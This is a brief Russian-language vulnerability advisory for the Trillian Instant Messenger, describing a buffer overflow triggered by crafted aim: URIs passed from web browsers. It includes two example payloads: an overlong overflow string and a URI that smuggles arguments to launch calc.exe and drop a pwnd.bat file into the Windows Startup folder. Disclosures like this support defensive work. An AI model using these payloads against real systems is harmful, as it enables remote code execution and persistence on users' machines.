Программа: Trillian Instant Messenger

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в Trillian Instant Messenger client при обработке aim: URI, которые могут передавать Web браузеры. Атакующий может передать специально сформированные aim: URI, что приведет к переполнению буфера и выполнению произвольного кода.

Примеры:

aim:///#1111111/11111111111111111111111111 111111111111111111111111111111111112222 222222222222222222222222222222222222222 222222222222222222222222222222222222222 222222222222222222222222222222222222222 222222222222222222222222222222222222222 222222222222222222222226666666AAAABBB B66666666666666666666666666666666666666 666666666666666666666666666666666666666 666666666666666666666666666666666666666 666666666666666666666666666666666666666 666666666666666666666666666666666666666 666666666666666666666666666666666666666 66666666666

aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"



Оставить мнение